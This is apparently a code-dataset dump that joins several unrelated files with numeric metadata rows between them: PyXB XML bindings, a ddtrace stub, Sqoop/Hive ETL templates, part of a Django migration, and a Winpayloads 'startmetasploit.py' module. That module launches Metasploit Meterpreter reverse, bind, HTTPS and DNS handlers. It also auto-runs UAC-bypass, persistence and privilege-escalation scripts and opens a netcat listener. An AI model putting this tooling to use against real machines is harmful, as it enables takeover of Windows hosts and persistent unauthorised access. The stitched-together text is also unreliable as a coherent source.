fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_38, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_30, False) ]))
st_30._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_31, True) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_38, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_31, False) ]))
st_31._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_32, True) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_32, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_32, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_32, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_32, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_32, False) ]))
transitions.append(fac.Transition(st_38, [
fac.UpdateInstruction(cc_32, False) ]))
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_32, False) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_32, False) ]))
st_32._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_33, True) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_33, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_33, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_33, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_33, False) ]))
transitions.append(fac.Transition(st_38, [
fac.UpdateInstruction(cc_33, False) ]))
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_33, False) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_33, False) ]))
st_33._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_34, True) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_34, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_34, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_34, False) ]))
transitions.append(fac.Transition(st_38, [
fac.UpdateInstruction(cc_34, False) ]))
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_34, False) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_34, False) ]))
st_34._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_35, True) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_35, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_35, False) ]))
transitions.append(fac.Transition(st_38, [
fac.UpdateInstruction(cc_35, False) ]))
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_35, False) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_35, False) ]))
st_35._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_36, True) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_36, False) ]))
transitions.append(fac.Transition(st_38, [
fac.UpdateInstruction(cc_36, False) ]))
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_36, False) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_36, False) ]))
st_36._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_37, True) ]))
transitions.append(fac.Transition(st_38, [
fac.UpdateInstruction(cc_37, False) ]))
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_37, False) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_37, False) ]))
st_37._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_38, [
fac.UpdateInstruction(cc_38, True) ]))
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_38, False) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_38, False) ]))
st_38._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_39, True) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_39, False) ]))
st_39._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_40, True) ]))
st_40._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
Body_._Automaton = _BuildAutomaton_2()
Fault_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'faultcode'), pyxb.binding.datatypes.QName, scope=Fault_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 112, 8)))
Fault_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'faultstring'), pyxb.binding.datatypes.string, scope=Fault_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 113, 8)))
Fault_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'faultactor'), pyxb.binding.datatypes.anyURI, scope=Fault_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 114, 8)))
Fault_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'detail'), detail, scope=Fault_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 115, 8)))
def _BuildAutomaton_3 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_3
del _BuildAutomaton_3
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 114, 8))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 115, 8))
counters.add(cc_1)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(Fault_._UseForTag(pyxb.namespace.ExpandedName(None, 'faultcode')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 112, 8))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(Fault_._UseForTag(pyxb.namespace.ExpandedName(None, 'faultstring')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 113, 8))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(Fault_._UseForTag(pyxb.namespace.ExpandedName(None, 'faultactor')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 114, 8))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(Fault_._UseForTag(pyxb.namespace.ExpandedName(None, 'detail')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 115, 8))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, True) ]))
st_3._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
Fault_._Automaton = _BuildAutomaton_3()
def _BuildAutomaton_4 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_4
del _BuildAutomaton_4
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 120, 8))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.WildcardUse(pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=pyxb.binding.content.Wildcard.NC_any), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 120, 8))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
detail._Automaton = _BuildAutomaton_4()
| 58.516678
| 409
| 0.743657
| 18,937
| 171,922
| 6.549876
| 0.02371
| 0.147539
| 0.162293
| 0.21115
| 0.818882
| 0.787197
| 0.782779
| 0.781384
| 0.7559
| 0.700407
| 0
| 0.03124
| 0.133462
| 171,922
| 2,937
| 410
| 58.536602
| 0.801338
| 0.041658
| 0
| 0.760724
| 1
| 0.000394
| 0.126297
| 0.11994
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002755
| false
| 0.003935
| 0.022432
| 0
| 0.086974
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a2da4cb3d4c122d1d326d604f8b0df707f21fbf1
| 68
|
py
|
Python
|
tests/profiling/uwsgi-app.py
|
p7g/dd-trace-py
|
141ac0ab6e9962e3b3bafc9de172076075289a19
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 308
|
2016-12-07T16:49:27.000Z
|
2022-03-15T10:06:45.000Z
|
tests/profiling/uwsgi-app.py
|
p7g/dd-trace-py
|
141ac0ab6e9962e3b3bafc9de172076075289a19
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 1,928
|
2016-11-28T17:13:18.000Z
|
2022-03-31T21:43:19.000Z
|
tests/profiling/uwsgi-app.py
|
p7g/dd-trace-py
|
141ac0ab6e9962e3b3bafc9de172076075289a19
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 311
|
2016-11-27T03:01:49.000Z
|
2022-03-18T21:34:03.000Z
|
import ddtrace.profiling.auto # noqa
def application():
pass
| 11.333333
| 37
| 0.705882
| 8
| 68
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.205882
| 68
| 5
| 38
| 13.6
| 0.888889
| 0.058824
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
a2dfc9a6d085915c3816c5b8bfecf14263a47139
| 5,184
|
py
|
Python
|
lib/startmetasploit.py
|
roberto-cavalli1/Winpayloads
|
f8697cb9ce154ec9f44090719ba41eaa6c07fccf
|
[
"Apache-2.0"
] | 8
|
2018-01-12T19:02:38.000Z
|
2022-01-27T12:10:35.000Z
|
lib/startmetasploit.py
|
roberto-cavalli1/Winpayloads
|
f8697cb9ce154ec9f44090719ba41eaa6c07fccf
|
[
"Apache-2.0"
] | null | null | null |
lib/startmetasploit.py
|
roberto-cavalli1/Winpayloads
|
f8697cb9ce154ec9f44090719ba41eaa6c07fccf
|
[
"Apache-2.0"
] | 4
|
2018-01-06T07:19:18.000Z
|
2021-04-24T02:06:29.000Z
|
import os
class METASPLOIT(object):
def __init__(self):
if os.geteuid == 0:
self.placeholder = ''
else:
self.placeholder = 'sudo '
########Reverse########
def metrev_uac(self,portnum):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LPORT %s;set LHOST 0.0.0.0;set autorunscript multi_console_command -rc uacbypass.rc;set ExitOnSession false;exploit -j\'' %(self.placeholder, portnum))
def metrev_allchecks(self,portnum):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LPORT %s;set LHOST 0.0.0.0;set autorunscript post/windows/manage/exec_powershell SCRIPT=allchecks.ps1;set ExitOnSession false;exploit -j\'' %(self.placeholder, portnum))
def metrev_persistence(self,portnum):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LPORT %s;set LHOST 0.0.0.0;set autorunscript multi_console_command -rc persist.rc;set ExitOnSession false;exploit -j\'' %(self.placeholder, portnum))
def metrev_normal(self,portnum):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LPORT %s;set LHOST 0.0.0.0;set ExitOnSession false; exploit -j\'' %(self.placeholder, portnum))
########Bind########
def metbind_uac(self,bindport,bindip):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/bind_tcp;set LPORT %s;set RHOST %s;set autorunscript multi_console_command -rc uacbypass.rc;set ExitOnSession false;exploit -j\'' % (self.placeholder, bindport, bindip))
def metbind_allchecks(self,bindport,bindip):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/bind_tcp;set LPORT %s;set RHOST %s;set autorunscript post/windows/manage/exec_powershell SCRIPT=allchecks.ps1;set ExitOnSession false;exploit -j\'' % (self.placeholder, bindport, bindip))
def metbind_persistence(self,bindport,bindip):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/bind_tcp;set LPORT %s;set RHOST %s;set autorunscript multi_console_command -rc persist.rc;set ExitOnSession false;exploit -j\'' % (self.placeholder, bindport, bindip))
def metbind_normal(self,bindport,bindip):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/bind_tcp;set LPORT %s;set RHOST %s;set ExitOnSession false; exploit -j \'' % (self.placeholder, bindport, bindip))
########Http########
def methttps_uac(self,portnum):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LPORT %s;set LHOST 0.0.0.0;set autorunscript multi_console_command -rc uacbypass.rc;set ExitOnSession false;exploit -j\'' % (self.placeholder, portnum))
def methttps_allchecks(self,portnum):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LPORT %s;set LHOST 0.0.0.0;set autorunscript post/windows/manage/exec_powershell SCRIPT=allchecks.ps1;set ExitOnSession false;exploit -j\'' % (self.placeholder, portnum))
def methttps_persistence(self,portnum):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LPORT %s;set LHOST 0.0.0.0;set autorunscript multi_console_command -rc persist.rc;set ExitOnSession false;exploit -j\'' % (self.placeholder, portnum))
def methttps_normal(self,portnum):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LPORT %s;set LHOST 0.0.0.0;set ExitOnSession false; exploit -j\'' % (self.placeholder, portnum))
########DNS########
def metdns_uac(self,portnum,DNSaddr):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp_dns;set LPORT %s;set LHOST %s;set autorunscript multi_console_command -rc uacbypass.rc;set ExitOnSession false;exploit -j\'' %(self.placeholder, portnum,DNSaddr))
def metdns_allchecks(self,portnum,DNSaddr):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp_dns;set LPORT %s;set LHOST %s;set autorunscript post/windows/manage/exec_powershell SCRIPT=allchecks.ps1;set ExitOnSession false;exploit -j\'' %(self.placeholder, portnum,DNSaddr))
def metdns_persistence(self,portnum,DNSaddr):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp_dns;set LPORT %s;set LHOST %s;set autorunscript multi_console_command -rc persist.rc;set ExitOnSession false; exploit -j\'' %(self.placeholder, portnum,DNSaddr))
def metdns_normal(self,portnum,DNSaddr):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp_dns;set LPORT %s;set LHOST %s;set ExitOnSession false; exploit -j\'' %(self.placeholder, portnum,DNSaddr))
########NC#######
def nclisterner(self,portnum):
os.system('%snc -lvp %s'%(self.placeholder, portnum))
| 105.795918
| 287
| 0.741512
| 711
| 5,184
| 5.322082
| 0.092827
| 0.02537
| 0.080338
| 0.084567
| 0.928911
| 0.928911
| 0.928911
| 0.928911
| 0.928911
| 0.899841
| 0
| 0.00813
| 0.122106
| 5,184
| 48
| 288
| 108
| 0.823336
| 0.003858
| 0
| 0
| 0
| 0
| 0.056834
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.439024
| false
| 0.097561
| 0.02439
| 0
| 0.487805
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
0c4f3931309a9f890e1f5024409981dc029d7273
| 1,667
|
py
|
Python
|
script/SqoopScript.py
|
wangfeigithub/mysql2hiveETL
|
ada8f6b69c5b09597141c3ef0ec0ca1ad8f586f1
|
[
"Apache-2.0"
] | 2
|
2019-08-14T02:29:32.000Z
|
2019-09-10T07:14:19.000Z
|
script/SqoopScript.py
|
wangfeigithub/mysql2hiveETL
|
ada8f6b69c5b09597141c3ef0ec0ca1ad8f586f1
|
[
"Apache-2.0"
] | null | null | null |
script/SqoopScript.py
|
wangfeigithub/mysql2hiveETL
|
ada8f6b69c5b09597141c3ef0ec0ca1ad8f586f1
|
[
"Apache-2.0"
] | 1
|
2019-09-10T07:14:21.000Z
|
2019-09-10T07:14:21.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/8/30 下午5:16
# @Author : wangfei
# hive脚本
# 有变化的数据去重合并
INCREMENT_ETL_SCRIPT = '''
/data/module/sqoop/bin/sqoop import -Dmapred.job.queue.name={}\
--connect jdbc:mysql://{}:3306/{}?tinyInt1isBit=false \
--username {} \
--password {} \
--table {} \
--columns "{}" \
--num-mappers {} \
--hive-import \
--hive-overwrite \
--hive-database {}_tmp \
--hive-table {}_increment \
--direct \
--delete-target-dir \
--where "({} >='{}' and {} <'{}') or ( {} >='{}' and {} <'{}' )"
'''
# 按照创建时间追加
APPEND_ETL_SCRIPT = '''
/data/module/sqoop/bin/sqoop import -Dmapred.job.queue.name={}\
--connect jdbc:mysql://{}:3306/{}?tinyInt1isBit=false \
--username {} \
--password {} \
--table {} \
--columns "{}" \
--num-mappers {} \
--hive-import \
--hive-database {} \
--hive-table {} \
--direct \
--delete-target-dir \
--where "{} >='{}' and {} <'{}'"
'''
# 全量导入
FULL_ETL_SCRIPT = '''
/data/module/sqoop/bin/sqoop import -Dmapred.job.queue.name={}\
--connect jdbc:mysql://{}:3306/{}?tinyInt1isBit=false \
--username {} \
--password {} \
--table {} \
--columns "{}" \
--num-mappers {} \
--hive-import \
--hive-overwrite \
--hive-database {} \
--hive-table {} \
--direct \
--delete-target-dir \
--where " {} <'{}'"
'''
| 27.327869
| 74
| 0.436713
| 137
| 1,667
| 5.255474
| 0.394161
| 0.0375
| 0.054167
| 0.079167
| 0.823611
| 0.823611
| 0.779167
| 0.779167
| 0.779167
| 0.670833
| 0
| 0.02381
| 0.344931
| 1,667
| 60
| 75
| 27.783333
| 0.635531
| 0.072585
| 0
| 0.829787
| 0
| 0
| 0.938231
| 0.191157
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.06383
| 0.12766
| 0
| 0.12766
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
a75881445197d72bd73bde91bab7cc30237f6303
| 24,870
|
py
|
Python
|
example/demosite/migrations/0001_initial.py
|
cityofaustin/wagtail-publish-preflight
|
5a40d20a7811c67d2c2e085c8127c8d35103a5c8
|
[
"BSD-3-Clause"
] | 1
|
2019-12-12T21:19:00.000Z
|
2019-12-12T21:19:00.000Z
|
example/demosite/migrations/0001_initial.py
|
cityofaustin/wagtail-publish-preflight
|
5a40d20a7811c67d2c2e085c8127c8d35103a5c8
|
[
"BSD-3-Clause"
] | 12
|
2020-06-06T01:21:32.000Z
|
2022-02-10T13:52:28.000Z
|
example/demosite/migrations/0001_initial.py
|
cityofaustin/wagtail-publish-preflight
|
5a40d20a7811c67d2c2e085c8127c8d35103a5c8
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by Django 2.2.8 on 2019-12-04 23:10
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.contrib.taggit
import modelcluster.fields
import wagtail.core.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
('wagtailimages', '0001_squashed_0021'),
('wagtailcore', '0041_group_collection_permissions_verbose_name_plural'),
('wagtaildocs', '0010_document_file_hash'),
('taggit', '0003_taggeditem_add_unique_index'),
]
operations = [
migrations.CreateModel(
name='BlogEntryPage',
fields=[
('page_ptr', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='+', serialize=False, to='wagtailcore.Page')),
('body', wagtail.core.fields.RichTextField()),
('date', models.DateField(verbose_name='Post date')),
('feed_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='BlogIndexPage',
fields=[
('page_ptr', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='+', serialize=False, to='wagtailcore.Page')),
('intro', wagtail.core.fields.RichTextField(blank=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='EventIndexPage',
fields=[
('page_ptr', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='+', serialize=False, to='wagtailcore.Page')),
('intro', wagtail.core.fields.RichTextField(blank=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='EventPage',
fields=[
('page_ptr', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='+', serialize=False, to='wagtailcore.Page')),
('date_from', models.DateField(verbose_name='Start date')),
('date_to', models.DateField(blank=True, help_text='Not required if event is on a single day', null=True, verbose_name='End date')),
('time_from', models.TimeField(blank=True, null=True, verbose_name='Start time')),
('time_to', models.TimeField(blank=True, null=True, verbose_name='End time')),
('audience', models.CharField(choices=[('public', 'Public'), ('private', 'Private')], max_length=255)),
('location', models.CharField(max_length=255)),
('body', wagtail.core.fields.RichTextField(blank=True)),
('cost', models.CharField(max_length=255)),
('signup_link', models.URLField(blank=True)),
('feed_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='HomePage',
fields=[
('page_ptr', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='+', serialize=False, to='wagtailcore.Page')),
('body', wagtail.core.fields.RichTextField(blank=True)),
],
options={
'verbose_name': 'homepage',
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='PersonPage',
fields=[
('telephone', models.CharField(blank=True, max_length=20)),
('email', models.EmailField(blank=True, max_length=254)),
('address_1', models.CharField(blank=True, max_length=255)),
('address_2', models.CharField(blank=True, max_length=255)),
('city', models.CharField(blank=True, max_length=255)),
('country', models.CharField(blank=True, max_length=255)),
('post_code', models.CharField(blank=True, max_length=10)),
('page_ptr', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='+', serialize=False, to='wagtailcore.Page')),
('first_name', models.CharField(max_length=255)),
('last_name', models.CharField(max_length=255)),
('intro', wagtail.core.fields.RichTextField(blank=True)),
('biography', wagtail.core.fields.RichTextField(blank=True)),
('feed_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page', models.Model),
),
migrations.CreateModel(
name='StandardIndexPage',
fields=[
('page_ptr', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='+', serialize=False, to='wagtailcore.Page')),
('intro', wagtail.core.fields.RichTextField(blank=True)),
('feed_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='StandardPage',
fields=[
('page_ptr', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='+', serialize=False, to='wagtailcore.Page')),
('intro', wagtail.core.fields.RichTextField(blank=True)),
('body', wagtail.core.fields.RichTextField(blank=True)),
('feed_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='StandardPageRelatedLink',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('link_external', models.URLField(blank=True, verbose_name='External link')),
('title', models.CharField(help_text='Link title', max_length=255)),
('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_links', to='demosite.StandardPage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='StandardPageCarouselItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('link_external', models.URLField(blank=True, verbose_name='External link')),
('embed_url', models.URLField(blank=True, verbose_name='Embed URL')),
('caption', models.CharField(blank=True, max_length=255)),
('image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='carousel_items', to='demosite.StandardPage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='StandardIndexPageRelatedLink',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('link_external', models.URLField(blank=True, verbose_name='External link')),
('title', models.CharField(help_text='Link title', max_length=255)),
('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
